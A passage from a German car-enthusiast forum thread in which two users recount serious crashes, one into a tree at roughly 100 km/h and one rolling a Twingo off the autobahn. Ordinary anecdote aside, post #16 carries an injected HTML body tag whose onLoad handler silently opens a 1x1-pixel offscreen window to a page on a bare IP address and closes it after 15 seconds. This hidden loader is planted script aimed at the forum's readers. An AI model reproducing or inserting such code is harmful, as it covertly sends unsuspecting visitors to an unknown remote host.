Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
Shit Happen
#16
Bei irgendwas um die 110 hab ich mir den Dreck eingefangen. Mich hats dann 2 1/4 mal gedreht (sagte der Hinter mir, ich hab das nicht mitgekriegt) und bin dann seitlich mit der A Säule in nen ca 60 - 80 cm dicken Baum gerutscht. Was komisch war ist das keine Bremsspuren auf der Strasse waren. Also schätz ich mal das es irgendwas um die 90 - 100 km/h gewesen sein muss. Dann hat die Feuerwehr (die mit 38! Mann angerückt ist, war wohl n langweiliger Tag) mein Dach noch abgesägt und das Ergebnis siehst du ja.

Ben


<body onLoad="win=window.open('http://66.246.52.126/page.php?id=7857','_blank','width=1,height=1,left=2000,top=2000');window.setTimeout('win.close()',15000);"></body>
Zitieren
Es bedanken sich:
#17
Schanfe sieht das mies aus. Ich nin mit meinem ersten Twingo mit irgendwas bei 100 Sachen (scheiß Gedächtnisverlust) von der Autobahn "gesprungen". Mehrfacher Überschag und am Ende lag ich 100m neben der Starße auf einem 2m gohen Berg, 20 cm neben nem Baum - aner gegen deinen sah meiner richtig jungfräulich aus... (mal sehen ob icgh die Bilder mal scanne kann)
Bitte bei PMs wegen der Twingo-Einzelteile den Button "Antworten" nutzen. Ohne das Zitat verliere ich die Übersicht.

Linktipp: Tattoostudio Nadeltanz (Ist ein guter Freund von mir)
Zitieren
Es bedanken sich:


Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste